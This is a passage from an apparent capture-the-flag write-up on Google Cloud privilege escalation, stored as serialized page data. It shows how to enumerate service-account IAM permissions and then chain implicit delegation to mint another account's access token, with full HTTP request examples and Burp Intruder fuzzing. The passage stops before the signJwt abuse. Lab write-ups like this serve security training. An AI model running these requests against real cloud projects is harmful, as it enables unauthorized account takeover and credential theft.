roles/owner\n",{"type":32,"tag":127,"props":1163,"children":1165},{"class":129,"line":1164},24,[1166,1170],{"type":32,"tag":127,"props":1167,"children":1168},{"style":134},[1169],{"type":37,"value":906},{"type":32,"tag":127,"props":1171,"children":1172},{"style":139},[1173],{"type":37,"value":911},{"type":32,"tag":127,"props":1175,"children":1177},{"class":129,"line":1176},25,[1178,1182],{"type":32,"tag":127,"props":1179,"children":1180},{"style":134},[1181],{"type":37,"value":919},{"type":32,"tag":127,"props":1183,"children":1184},{"style":139},[1185],{"type":37,"value":1110},{"type":32,"tag":127,"props":1187,"children":1189},{"class":129,"line":1188},26,[1190,1194],{"type":32,"tag":127,"props":1191,"children":1192},{"style":134},[1193],{"type":37,"value":932},{"type":32,"tag":127,"props":1195,"children":1196},{"style":139},[1197],{"type":37,"value":1198}," roles/run.invoker\n",{"type":32,"tag":127,"props":1200,"children":1202},{"class":129,"line":1201},27,[1203,1207],{"type":32,"tag":127,"props":1204,"children":1205},{"style":134},[1206],{"type":37,"value":906},{"type":32,"tag":127,"props":1208,"children":1209},{"style":139},[1210],{"type":37,"value":911},{"type":32,"tag":127,"props":1212,"children":1214},{"class":129,"line":1213},28,[1215,1219],{"type":32,"tag":127,"props":1216,"children":1217},{"style":134},[1218],{"type":37,"value":919},{"type":32,"tag":127,"props":1220,"children":1221},{"style":139},[1222],{"type":37,"value":1110},{"type":32,"tag":127,"props":1224,"children":1226},{"class":129,"line":1225},29,[1227,1231],{"type":32,"tag":127,"props":1228,"children":1229},{"style":134},[1230],{"type":37,"value":932},{"type":32,"tag":127,"props":1232,"children":1233},{"style":139},[1234],{"type":37,"value":1235}," roles/secretmanager.viewer\n",{"type":32,"tag":127,"props":1237,"children":1239},{"class":129,"line":1238},30,[1240,1244],{"type":32,"tag":127,"props":1241,"children":1242},{"style":134},[1243],{"type":37,"value":906},{"type":32,"tag":127,"props":1245,"children":1246},{"style":139},[1247],{"type":37,"value":911},{"type":32,"tag":127,"props":1249,"children":1251},{"class":129,"line":1250},31,[1252,1256],{"type":32,"tag":127,"props":1253,"children":1254},{"style":134},[1255],{"type":37,"value":919},{"type":32,"tag":127,"props":1257,"children":1258},{"style":139},[1259],{"type":37,"value":924},{"type":32,"tag":127,"props":1261,"children":1263},{"class":129,"line":1262},32,[1264,1268],{"type":32,"tag":127,"props":1265,"children":1266},{"style":134},[1267],{"type":37,"value":932},{"type":32,"tag":127,"props":1269,"children":1270},{"style":139},[1271],{"type":37,"value":1272}," roles/storage.bucketViewer\n",{"type":32,"tag":127,"props":1274,"children":1276},{"class":129,"line":1275},33,[1277,1281],{"type":32,"tag":127,"props":1278,"children":1279},{"style":134},[1280],{"type":37,"value":906},{"type":32,"tag":127,"props":1282,"children":1283},{"style":139},[1284],{"type":37,"value":911},{"type":32,"tag":127,"props":1286,"children":1288},{"class":129,"line":1287},34,[1289,1293],{"type":32,"tag":127,"props":1290,"children":1291},{"style":134},[1292],{"type":37,"value":919},{"type":32,"tag":127,"props":1294,"children":1295},{"style":139},[1296],{"type":37,"value":924},{"type":32,"tag":127,"props":1298,"children":1300},{"class":129,"line":1299},35,[1301,1305],{"type":32,"tag":127,"props":1302,"children":1303},{"style":134},[1304],{"type":37,"value":932},{"type":32,"tag":127,"props":1306,"children":1307},{"style":139},[1308],{"type":37,"value":1309}," roles/storage.objectViewer\n",{"type":32,"tag":127,"props":1311,"children":1313},{"class":129,"line":1312},36,[1314,1319],{"type":32,"tag":127,"props":1315,"children":1316},{"style":134},[1317],{"type":37,"value":1318},"etag:",{"type":32,"tag":127,"props":1320,"children":1321},{"style":139},[1322],{"type":37,"value":1323}," BwYxzfQaKR4=\n",{"type":32,"tag":127,"props":1325,"children":1327},{"class":129,"line":1326},37,[1328,1333],{"type":32,"tag":127,"props":1329,"children":1330},{"style":134},[1331],{"type":37,"value":1332},"version:",{"type":32,"tag":127,"props":1334,"children":1335},{"style":522},[1336],{"type":37,"value":1337}," 1\n",{"type":32,"tag":46,"props":1339,"children":1340},{},[1341],{"type":37,"value":1342},"From the command output, we have both the roles and the list of service accounts, this information is really important because it will allow us to list the actions that our current service account has on other service accounts.",{"type":32,"tag":46,"props":1344,"children":1345},{},[1346],{"type":37,"value":1347},"The permissions that are relevant in our case are the following:",{"type":32,"tag":238,"props":1349,"children":1350},{},[1351,1356,1361,1366],{"type":32,"tag":242,"props":1352,"children":1353},{},[1354],{"type":37,"value":1355},"iam.serviceAccounts.getAccessToken",{"type":32,"tag":242,"props":1357,"children":1358},{},[1359],{"type":37,"value":1360},"iam.serviceAccounts.signJwt",{"type":32,"tag":242,"props":1362,"children":1363},{},[1364],{"type":37,"value":1365},"iam.serviceAccounts.implicitDelegation",{"type":32,"tag":242,"props":1367,"children":1368},{},[1369],{"type":37,"value":1370},"iam.serviceAccounts.actAs",{"type":32,"tag":46,"props":1372,"children":1373},{},[1374],{"type":37,"value":1375},"Each of them allows us to elevate our privileges horizontally to another service account.",{"type":32,"tag":46,"props":1377,"children":1378},{},[1379],{"type":37,"value":1380},"To enumerate, we can use the GCP API which allows us to know the permissions our service account has in relation to the target service account:",{"type":32,"tag":238,"props":1382,"children":1383},{},[1384,1395,1406,1419],{"type":32,"tag":242,"props":1385,"children":1386},{},[1387,1389],{"type":37,"value":1388},"URL: ",{"type":32,"tag":104,"props":1390,"children":1392},{"className":1391},[],[1393],{"type":37,"value":1394},"https://iam.googleapis.com/v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions",{"type":32,"tag":242,"props":1396,"children":1397},{},[1398,1400],{"type":37,"value":1399},"Method: ",{"type":32,"tag":104,"props":1401,"children":1403},{"className":1402},[],[1404],{"type":37,"value":1405},"POST",{"type":32,"tag":242,"props":1407,"children":1408},{},[1409,1411,1417],{"type":37,"value":1410},"Mandatory header: ",{"type":32,"tag":104,"props":1412,"children":1414},{"className":1413},[],[1415],{"type":37,"value":1416},"Authorization Bearer",{"type":37,"value":1418}," with the access token from our service account.",{"type":32,"tag":242,"props":1420,"children":1421},{},[1422],{"type":37,"value":1423},"Body:",{"type":32,"tag":113,"props":1425,"children":1426},{"lang":632},[1427],{"type":32,"tag":118,"props":1428,"children":1430},{"className":636,"code":1429,"language":632,"meta":7,"style":7},"{\n  \"permissions\": [\n    \"iam.serviceAccounts.getAccessToken\",\n    \"iam.serviceAccounts.signJwt\",\n    \"iam.serviceAccounts.implicitDelegation\",\n    \"iam.serviceAccounts.actAs\"\n  ]\n}\n",[1431],{"type":32,"tag":104,"props":1432,"children":1433},{"__ignoreMap":7},[1434,1441,1466,1485,1504,1523,1538,1546],{"type":32,"tag":127,"props":1435,"children":1436},{"class":129,"line":130},[1437],{"type":32,"tag":127,"props":1438,"children":1439},{"style":311},[1440],{"type":37,"value":649},{"type":32,"tag":127,"props":1442,"children":1443},{"class":129,"line":361},[1444,1448,1453,1457,1461],{"type":32,"tag":127,"props":1445,"children":1446},{"style":655},[1447],{"type":37,"value":658},{"type":32,"tag":127,"props":1449,"children":1450},{"style":436},[1451],{"type":37,"value":1452},"permissions",{"type":32,"tag":127,"props":1454,"children":1455},{"style":655},[1456],{"type":37,"value":668},{"type":32,"tag":127,"props":1458,"children":1459},{"style":311},[1460],{"type":37,"value":283},{"type":32,"tag":127,"props":1462,"children":1463},{"style":311},[1464],{"type":37,"value":1465}," [\n",{"type":32,"tag":127,"props":1467,"children":1468},{"class":129,"line":402},[1469,1473,1477,1481],{"type":32,"tag":127,"props":1470,"children":1471},{"style":675},[1472],{"type":37,"value":770},{"type":32,"tag":127,"props":1474,"children":1475},{"style":139},[1476],{"type":37,"value":1355},{"type":32,"tag":127,"props":1478,"children":1479},{"style":675},[1480],{"type":37,"value":668},{"type":32,"tag":127,"props":1482,"children":1483},{"style":311},[1484],{"type":37,"value":692},{"type":32,"tag":127,"props":1486,"children":1487},{"class":129,"line":738},[1488,1492,1496,1500],{"type":32,"tag":127,"props":1489,"children":1490},{"style":675},[1491],{"type":37,"value":770},{"type":32,"tag":127,"props":1493,"children":1494},{"style":139},[1495],{"type":37,"value":1360},{"type":32,"tag":127,"props":1497,"children":1498},{"style":675},[1499],{"type":37,"value":668},{"type":32,"tag":127,"props":1501,"children":1502},{"style":311},[1503],{"type":37,"value":692},{"type":32,"tag":127,"props":1505,"children":1506},{"class":129,"line":764},[1507,1511,1515,1519],{"type":32,"tag":127,"props":1508,"children":1509},{"style":675},[1510],{"type":37,"value":770},{"type":32,"tag":127,"props":1512,"children":1513},{"style":139},[1514],{"type":37,"value":1365},{"type":32,"tag":127,"props":1516,"children":1517},{"style":675},[1518],{"type":37,"value":668},{"type":32,"tag":127,"props":1520,"children":1521},{"style":311},[1522],{"type":37,"value":692},{"type":32,"tag":127,"props":1524,"children":1525},{"class":129,"line":803},[1526,1530,1534],{"type":32,"tag":127,"props":1527,"children":1528},{"style":675},[1529],{"type":37,"value":770},{"type":32,"tag":127,"props":1531,"children":1532},{"style":139},[1533],{"type":37,"value":1370},{"type":32,"tag":127,"props":1535,"children":1536},{"style":675},[1537],{"type":37,"value":835},{"type":32,"tag":127,"props":1539,"children":1540},{"class":129,"line":838},[1541],{"type":32,"tag":127,"props":1542,"children":1543},{"style":311},[1544],{"type":37,"value":1545},"  ]\n",{"type":32,"tag":127,"props":1547,"children":1548},{"class":129,"line":847},[1549],{"type":32,"tag":127,"props":1550,"children":1551},{"style":311},[1552],{"type":37,"value":853},{"type":32,"tag":46,"props":1554,"children":1555},{},[1556],{"type":37,"value":1557},"Here is an example of an HTTP request:",{"type":32,"tag":113,"props":1559,"children":1561},{"lang":1560},"http",[1562],{"type":32,"tag":118,"props":1563,"children":1566},{"className":1564,"code":1565,"language":1560,"meta":7,"style":7},"language-http shiki shiki-themes vitesse-dark","POST /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions HTTP/2\nHost: iam.googleapis.com\nAuthorization: Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\nAccept: */*\nContent-Type: application/json\nContent-Length: 159\n\n{\n  \"permissions\": [\n    \"iam.serviceAccounts.getAccessToken\",\n    \"iam.serviceAccounts.signJwt\",\n    \"iam.serviceAccounts.implicitDelegation\",\n    \"iam.serviceAccounts.actAs\"\n    ]\n}\n",[1567],{"type":32,"tag":104,"props":1568,"children":1569},{"__ignoreMap":7},[1570,1583,1596,1609,1622,1635,1648,1655,1662,1685,1704,1723,1742,1757,1765],{"type":32,"tag":127,"props":1571,"children":1572},{"class":129,"line":130},[1573,1578],{"type":32,"tag":127,"props":1574,"children":1576},{"style":1575},"--shiki-default:#4D9375",[1577],{"type":37,"value":1405},{"type":32,"tag":127,"props":1579,"children":1580},{"style":322},[1581],{"type":37,"value":1582}," /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions HTTP/2\n",{"type":32,"tag":127,"props":1584,"children":1585},{"class":129,"line":361},[1586,1591],{"type":32,"tag":127,"props":1587,"children":1588},{"style":1575},[1589],{"type":37,"value":1590},"Host:",{"type":32,"tag":127,"props":1592,"children":1593},{"style":139},[1594],{"type":37,"value":1595}," iam.googleapis.com\n",{"type":32,"tag":127,"props":1597,"children":1598},{"class":129,"line":402},[1599,1604],{"type":32,"tag":127,"props":1600,"children":1601},{"style":1575},[1602],{"type":37,"value":1603},"Authorization:",{"type":32,"tag":127,"props":1605,"children":1606},{"style":139},[1607],{"type":37,"value":1608}," Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\n",{"type":32,"tag":127,"props":1610,"children":1611},{"class":129,"line":738},[1612,1617],{"type":32,"tag":127,"props":1613,"children":1614},{"style":1575},[1615],{"type":37,"value":1616},"Accept:",{"type":32,"tag":127,"props":1618,"children":1619},{"style":139},[1620],{"type":37,"value":1621}," */*\n",{"type":32,"tag":127,"props":1623,"children":1624},{"class":129,"line":764},[1625,1630],{"type":32,"tag":127,"props":1626,"children":1627},{"style":1575},[1628],{"type":37,"value":1629},"Content-Type:",{"type":32,"tag":127,"props":1631,"children":1632},{"style":139},[1633],{"type":37,"value":1634}," application/json\n",{"type":32,"tag":127,"props":1636,"children":1637},{"class":129,"line":803},[1638,1643],{"type":32,"tag":127,"props":1639,"children":1640},{"style":1575},[1641],{"type":37,"value":1642},"Content-Length:",{"type":32,"tag":127,"props":1644,"children":1645},{"style":139},[1646],{"type":37,"value":1647}," 159\n",{"type":32,"tag":127,"props":1649,"children":1650},{"class":129,"line":838},[1651],{"type":32,"tag":127,"props":1652,"children":1653},{"emptyLinePlaceholder":895},[1654],{"type":37,"value":898},{"type":32,"tag":127,"props":1656,"children":1657},{"class":129,"line":847},[1658],{"type":32,"tag":127,"props":1659,"children":1660},{"style":311},[1661],{"type":37,"value":649},{"type":32,"tag":127,"props":1663,"children":1664},{"class":129,"line":975},[1665,1669,1673,1677,1681],{"type":32,"tag":127,"props":1666,"children":1667},{"style":655},[1668],{"type":37,"value":658},{"type":32,"tag":127,"props":1670,"children":1671},{"style":436},[1672],{"type":37,"value":1452},{"type":32,"tag":127,"props":1674,"children":1675},{"style":655},[1676],{"type":37,"value":668},{"type":32,"tag":127,"props":1678,"children":1679},{"style":311},[1680],{"type":37,"value":283},{"type":32,"tag":127,"props":1682,"children":1683},{"style":311},[1684],{"type":37,"value":1465},{"type":32,"tag":127,"props":1686,"children":1687},{"class":129,"line":987},[1688,1692,1696,1700],{"type":32,"tag":127,"props":1689,"children":1690},{"style":675},[1691],{"type":37,"value":770},{"type":32,"tag":127,"props":1693,"children":1694},{"style":139},[1695],{"type":37,"value":1355},{"type":32,"tag":127,"props":1697,"children":1698},{"style":675},[1699],{"type":37,"value":668},{"type":32,"tag":127,"props":1701,"children":1702},{"style":311},[1703],{"type":37,"value":692},{"type":32,"tag":127,"props":1705,"children":1706},{"class":129,"line":1000},[1707,1711,1715,1719],{"type":32,"tag":127,"props":1708,"children":1709},{"style":675},[1710],{"type":37,"value":770},{"type":32,"tag":127,"props":1712,"children":1713},{"style":139},[1714],{"type":37,"value":1360},{"type":32,"tag":127,"props":1716,"children":1717},{"style":675},[1718],{"type":37,"value":668},{"type":32,"tag":127,"props":1720,"children":1721},{"style":311},[1722],{"type":37,"value":692},{"type":32,"tag":127,"props":1724,"children":1725},{"class":129,"line":1013},[1726,1730,1734,1738],{"type":32,"tag":127,"props":1727,"children":1728},{"style":675},[1729],{"type":37,"value":770},{"type":32,"tag":127,"props":1731,"children":1732},{"style":139},[1733],{"type":37,"value":1365},{"type":32,"tag":127,"props":1735,"children":1736},{"style":675},[1737],{"type":37,"value":668},{"type":32,"tag":127,"props":1739,"children":1740},{"style":311},[1741],{"type":37,"value":692},{"type":32,"tag":127,"props":1743,"children":1744},{"class":129,"line":1025},[1745,1749,1753],{"type":32,"tag":127,"props":1746,"children":1747},{"style":675},[1748],{"type":37,"value":770},{"type":32,"tag":127,"props":1750,"children":1751},{"style":139},[1752],{"type":37,"value":1370},{"type":32,"tag":127,"props":1754,"children":1755},{"style":675},[1756],{"type":37,"value":835},{"type":32,"tag":127,"props":1758,"children":1759},{"class":129,"line":1037},[1760],{"type":32,"tag":127,"props":1761,"children":1762},{"style":311},[1763],{"type":37,"value":1764},"    ]\n",{"type":32,"tag":127,"props":1766,"children":1767},{"class":129,"line":1050},[1768],{"type":32,"tag":127,"props":1769,"children":1770},{"style":311},[1771],{"type":37,"value":853},{"type":32,"tag":46,"props":1773,"children":1774},{},[1775],{"type":37,"value":1776},"The response will contain the permissions that our service account has on the target service account.",{"type":32,"tag":46,"props":1778,"children":1779},{},[1780],{"type":37,"value":1781},"You will need to go through each service account with this request to determine if our service account has one or several of these permissions on another service account. Personally, I use Burp's Intruder but it's possible to make a custom bash script or use ffuf.",{"type":32,"tag":74,"props":1783,"children":1785},{"imgSrc":1784,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743699663/writeups/pwnedlabs-gcp-challenge/intruder-enum-perms.webp",[],{"type":32,"tag":46,"props":1787,"children":1788},{},[1789,1791,1797],{"type":37,"value":1790},"After our enumeration, we can see that one of the requests has a longer return size than the others and we can see that we have implicit delegation rights on the service account ",{"type":32,"tag":104,"props":1792,"children":1794},{"className":1793},[],[1795],{"type":37,"value":1796},"sql-424@gr-proj-4.iam.gserviceaccount.com",{"type":37,"value":214},{"type":32,"tag":74,"props":1799,"children":1801},{"imgSrc":1800},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743699775/writeups/pwnedlabs-gcp-challenge/result-intruder-enum-first.webp",[],{"type":32,"tag":46,"props":1803,"children":1804},{},[1805],{"type":37,"value":1806},"In the following chapter, we will detail the implicit delegation attack path to escalate our privileges horizontally.",{"type":32,"tag":39,"props":1808,"children":1810},{"id":1809},"implicit-delegation",[1811],{"type":37,"value":1812},"Implicit delegation",{"type":32,"tag":46,"props":1814,"children":1815},{},[1816,1818,1825],{"type":37,"value":1817},"Before we begin, I invite you to read the ",{"type":32,"tag":52,"props":1819,"children":1822},{"href":1820,"rel":1821},"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1",[56],[1823],{"type":37,"value":1824},"rhinosecurity article",{"type":37,"value":1826}," about privilege escalation methods on GCP, where a section is dedicated to implicit delegation.",{"type":32,"tag":46,"props":1828,"children":1829},{},[1830],{"type":37,"value":1831},"What does the privilege escalation scenario via implicit delegation permission consist of?",{"type":32,"tag":46,"props":1833,"children":1834},{},[1835,1837,1843,1845,1851],{"type":37,"value":1836},"Implicit delegation occurs when a service account A has ",{"type":32,"tag":104,"props":1838,"children":1840},{"className":1839},[],[1841],{"type":37,"value":1842},"implicitDelegation",{"type":37,"value":1844}," rights on a service account B which itself has ",{"type":32,"tag":104,"props":1846,"children":1848},{"className":1847},[],[1849],{"type":37,"value":1850},"getAccessToken",{"type":37,"value":1852}," rights on a service account C.",{"type":32,"tag":46,"props":1854,"children":1855},{},[1856],{"type":37,"value":1857},"So in our case we have this diagram:",{"type":32,"tag":74,"props":1859,"children":1862},{"imgSrc":1860,":width":1861},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743719479/writeups/pwnedlabs-gcp-challenge/implicit-delegation.webp","500",[],{"type":32,"tag":46,"props":1864,"children":1865},{},[1866],{"type":37,"value":1867},"To exploit this attack path, we will also go through the GCP API to get the access token of the service account C:",{"type":32,"tag":238,"props":1869,"children":1870},{},[1871,1881,1890,1900],{"type":32,"tag":242,"props":1872,"children":1873},{},[1874,1875],{"type":37,"value":1388},{"type":32,"tag":104,"props":1876,"children":1878},{"className":1877},[],[1879],{"type":37,"value":1880},"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken",{"type":32,"tag":242,"props":1882,"children":1883},{},[1884,1885],{"type":37,"value":1399},{"type":32,"tag":104,"props":1886,"children":1888},{"className":1887},[],[1889],{"type":37,"value":1405},{"type":32,"tag":242,"props":1891,"children":1892},{},[1893,1894,1899],{"type":37,"value":1410},{"type":32,"tag":104,"props":1895,"children":1897},{"className":1896},[],[1898],{"type":37,"value":1416},{"type":37,"value":1418},{"type":32,"tag":242,"props":1901,"children":1902},{},[1903],{"type":37,"value":1423},{"type":32,"tag":113,"props":1905,"children":1906},{"lang":632},[1907],{"type":32,"tag":118,"props":1908,"children":1910},{"className":636,"code":1909,"language":632,"meta":7,"style":7},"{\n  \"delegates\": [\"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com\"],\n  \"scope\": [\"https://www.googleapis.com/auth/cloud-platform\"] \n}\n",[1911],{"type":32,"tag":104,"props":1912,"children":1913},{"__ignoreMap":7},[1914,1921,1962,2008],{"type":32,"tag":127,"props":1915,"children":1916},{"class":129,"line":130},[1917],{"type":32,"tag":127,"props":1918,"children":1919},{"style":311},[1920],{"type":37,"value":649},{"type":32,"tag":127,"props":1922,"children":1923},{"class":129,"line":361},[1924,1928,1933,1937,1941,1945,1949,1954,1958],{"type":32,"tag":127,"props":1925,"children":1926},{"style":655},[1927],{"type":37,"value":658},{"type":32,"tag":127,"props":1929,"children":1930},{"style":436},[1931],{"type":37,"value":1932},"delegates",{"type":32,"tag":127,"props":1934,"children":1935},{"style":655},[1936],{"type":37,"value":668},{"type":32,"tag":127,"props":1938,"children":1939},{"style":311},[1940],{"type":37,"value":283},{"type":32,"tag":127,"props":1942,"children":1943},{"style":311},[1944],{"type":37,"value":717},{"type":32,"tag":127,"props":1946,"children":1947},{"style":675},[1948],{"type":37,"value":668},{"type":32,"tag":127,"props":1950,"children":1951},{"style":139},[1952],{"type":37,"value":1953},"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com",{"type":32,"tag":127,"props":1955,"children":1956},{"style":675},[1957],{"type":37,"value":668},{"type":32,"tag":127,"props":1959,"children":1960},{"style":311},[1961],{"type":37,"value":735},{"type":32,"tag":127,"props":1963,"children":1964},{"class":129,"line":402},[1965,1969,1974,1978,1982,1986,1990,1995,1999,2003],{"type":32,"tag":127,"props":1966,"children":1967},{"style":655},[1968],{"type":37,"value":658},{"type":32,"tag":127,"props":1970,"children":1971},{"style":436},[1972],{"type":37,"value":1973},"scope",{"type":32,"tag":127,"props":1975,"children":1976},{"style":655},[1977],{"type":37,"value":668},{"type":32,"tag":127,"props":1979,"children":1980},{"style":311},[1981],{"type":37,"value":283},{"type":32,"tag":127,"props":1983,"children":1984},{"style":311},[1985],{"type":37,"value":717},{"type":32,"tag":127,"props":1987,"children":1988},{"style":675},[1989],{"type":37,"value":668},{"type":32,"tag":127,"props":1991,"children":1992},{"style":139},[1993],{"type":37,"value":1994},"https://www.googleapis.com/auth/cloud-platform",{"type":32,"tag":127,"props":1996,"children":1997},{"style":675},[1998],{"type":37,"value":668},{"type":32,"tag":127,"props":2000,"children":2001},{"style":311},[2002],{"type":37,"value":353},{"type":32,"tag":127,"props":2004,"children":2005},{"style":322},[2006],{"type":37,"value":2007}," \n",{"type":32,"tag":127,"props":2009,"children":2010},{"class":129,"line":738},[2011],{"type":32,"tag":127,"props":2012,"children":2013},{"style":311},[2014],{"type":37,"value":853},{"type":32,"tag":46,"props":2016,"children":2017},{},[2018],{"type":37,"value":1557},{"type":32,"tag":113,"props":2020,"children":2021},{"lang":1560},[2022],{"type":32,"tag":118,"props":2023,"children":2025},{"className":1564,"code":2024,"language":1560,"meta":7,"style":7},"POST /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken HTTP/2\nHost: iamcredentials.googleapis.com\nAuthorization: Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\nAccept: */*\nContent-Type: application/json\nContent-Length: 149\n\n{\n  \"delegates\":[\n    \"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com\"\n  ],\n  \"scope\": [\n    \"https://www.googleapis.com/auth/cloud-platform\"\n  ]\n}\n",[2026],{"type":32,"tag":104,"props":2027,"children":2028},{"__ignoreMap":7},[2029,2041,2053,2064,2075,2086,2098,2105,2112,2132,2147,2155,2178,2193,2200],{"type":32,"tag":127,"props":2030,"children":2031},{"class":129,"line":130},[2032,2036],{"type":32,"tag":127,"props":2033,"children":2034},{"style":1575},[2035],{"type":37,"value":1405},{"type":32,"tag":127,"props":2037,"children":2038},{"style":322},[2039],{"type":37,"value":2040}," /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken HTTP/2\n",{"type":32,"tag":127,"props":2042,"children":2043},{"class":129,"line":361},[2044,2048],{"type":32,"tag":127,"props":2045,"children":2046},{"style":1575},[2047],{"type":37,"value":1590},{"type":32,"tag":127,"props":2049,"children":2050},{"style":139},[2051],{"type":37,"value":2052}," iamcredentials.googleapis.com\n",{"type":32,"tag":127,"props":2054,"children":2055},{"class":129,"line":402},[2056,2060],{"type":32,"tag":127,"props":2057,"children":2058},{"style":1575},[2059],{"type":37,"value":1603},{"type":32,"tag":127,"props":2061,"children":2062},{"style":139},[2063],{"type":37,"value":1608},{"type":32,"tag":127,"props":2065,"children":2066},{"class":129,"line":738},[2067,2071],{"type":32,"tag":127,"props":2068,"children":2069},{"style":1575},[2070],{"type":37,"value":1616},{"type":32,"tag":127,"props":2072,"children":2073},{"style":139},[2074],{"type":37,"value":1621},{"type":32,"tag":127,"props":2076,"children":2077},{"class":129,"line":764},[2078,2082],{"type":32,"tag":127,"props":2079,"children":2080},{"style":1575},[2081],{"type":37,"value":1629},{"type":32,"tag":127,"props":2083,"children":2084},{"style":139},[2085],{"type":37,"value":1634},{"type":32,"tag":127,"props":2087,"children":2088},{"class":129,"line":803},[2089,2093],{"type":32,"tag":127,"props":2090,"children":2091},{"style":1575},[2092],{"type":37,"value":1642},{"type":32,"tag":127,"props":2094,"children":2095},{"style":139},[2096],{"type":37,"value":2097}," 149\n",{"type":32,"tag":127,"props":2099,"children":2100},{"class":129,"line":838},[2101],{"type":32,"tag":127,"props":2102,"children":2103},{"emptyLinePlaceholder":895},[2104],{"type":37,"value":898},{"type":32,"tag":127,"props":2106,"children":2107},{"class":129,"line":847},[2108],{"type":32,"tag":127,"props":2109,"children":2110},{"style":311},[2111],{"type":37,"value":649},{"type":32,"tag":127,"props":2113,"children":2114},{"class":129,"line":975},[2115,2119,2123,2127],{"type":32,"tag":127,"props":2116,"children":2117},{"style":655},[2118],{"type":37,"value":658},{"type":32,"tag":127,"props":2120,"children":2121},{"style":436},[2122],{"type":37,"value":1932},{"type":32,"tag":127,"props":2124,"children":2125},{"style":655},[2126],{"type":37,"value":668},{"type":32,"tag":127,"props":2128,"children":2129},{"style":311},[2130],{"type":37,"value":2131},":[\n",{"type":32,"tag":127,"props":2133,"children":2134},{"class":129,"line":987},[2135,2139,2143],{"type":32,"tag":127,"props":2136,"children":2137},{"style":675},[2138],{"type":37,"value":770},{"type":32,"tag":127,"props":2140,"children":2141},{"style":139},[2142],{"type":37,"value":1953},{"type":32,"tag":127,"props":2144,"children":2145},{"style":675},[2146],{"type":37,"value":835},{"type":32,"tag":127,"props":2148,"children":2149},{"class":129,"line":1000},[2150],{"type":32,"tag":127,"props":2151,"children":2152},{"style":311},[2153],{"type":37,"value":2154},"  ],\n",{"type":32,"tag":127,"props":2156,"children":2157},{"class":129,"line":1013},[2158,2162,2166,2170,2174],{"type":32,"tag":127,"props":2159,"children":2160},{"style":655},[2161],{"type":37,"value":658},{"type":32,"tag":127,"props":2163,"children":2164},{"style":436},[2165],{"type":37,"value":1973},{"type":32,"tag":127,"props":2167,"children":2168},{"style":655},[2169],{"type":37,"value":668},{"type":32,"tag":127,"props":2171,"children":2172},{"style":311},[2173],{"type":37,"value":283},{"type":32,"tag":127,"props":2175,"children":2176},{"style":311},[2177],{"type":37,"value":1465},{"type":32,"tag":127,"props":2179,"children":2180},{"class":129,"line":1025},[2181,2185,2189],{"type":32,"tag":127,"props":2182,"children":2183},{"style":675},[2184],{"type":37,"value":770},{"type":32,"tag":127,"props":2186,"children":2187},{"style":139},[2188],{"type":37,"value":1994},{"type":32,"tag":127,"props":2190,"children":2191},{"style":675},[2192],{"type":37,"value":835},{"type":32,"tag":127,"props":2194,"children":2195},{"class":129,"line":1037},[2196],{"type":32,"tag":127,"props":2197,"children":2198},{"style":311},[2199],{"type":37,"value":1545},{"type":32,"tag":127,"props":2201,"children":2202},{"class":129,"line":1050},[2203],{"type":32,"tag":127,"props":2204,"children":2205},{"style":311},[2206],{"type":37,"value":853},{"type":32,"tag":46,"props":2208,"children":2209},{},[2210],{"type":37,"value":2211},"The response will contain the access token of the service account C.",{"type":32,"tag":46,"props":2213,"children":2214},{},[2215,2217,2223],{"type":37,"value":2216},"In our case, we don't know if the ",{"type":32,"tag":104,"props":2218,"children":2220},{"className":2219},[],[2221],{"type":37,"value":2222},"sql-424",{"type":37,"value":2224}," service account has getAccessToken rights on another service account, similar to enumeration parts we will need to fuzz with the service accounts that we are targeting.",{"type":32,"tag":74,"props":2226,"children":2228},{"imgSrc":2227,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743700878/writeups/pwnedlabs-gcp-challenge/implicit-delegation-intruder.webp",[],{"type":32,"tag":46,"props":2230,"children":2231},{},[2232,2234,2239,2241,2246,2248,2254],{"type":37,"value":2233},"After our fuzzing, we can see that the service account ",{"type":32,"tag":104,"props":2235,"children":2237},{"className":2236},[],[2238],{"type":37,"value":2222},{"type":37,"value":2240}," has the ",{"type":32,"tag":104,"props":2242,"children":2244},{"className":2243},[],[2245],{"type":37,"value":1850},{"type":37,"value":2247}," permission on the ",{"type":32,"tag":104,"props":2249,"children":2251},{"className":2250},[],[2252],{"type":37,"value":2253},"analytics",{"type":37,"value":2255}," service account, which allowed us to retrieve its token.",{"type":32,"tag":74,"props":2257,"children":2259},{"imgSrc":2258,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743701439/writeups/pwnedlabs-gcp-challenge/intruder-implicit-delegation-result.webp",[],{"type":32,"tag":46,"props":2261,"children":2262},{},[2263],{"type":37,"value":2264},"Now that we have a service account, we can repeat the enumeration process by fuzzing the permissions that our service account has on other service accounts.",{"type":32,"tag":74,"props":2266,"children":2268},{"imgSrc":2267,":width":77},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743717471/writeups/pwnedlabs-gcp-challenge/result-intruder-enum-second.webp",[],{"type":32,"tag":46,"props":2270,"children":2271},{},[2272,2274,2279,2281,2287],{"type":37,"value":2273},"We can see that our new ",{"type":32,"tag":104,"props":2275,"children":2277},{"className":2276},[],[2278],{"type":37,"value":2253},{"type":37,"value":2280}," service account has signJwt permissions on the ",{"type":32,"tag":104,"props":2282,"children":2284},{"className":2283},[],[2285],{"type":37,"value":2286},"platform-middleware",{"type":37,"value":2288}," service account. We will see on the next chapiter how to abuse this privilege to elevate our 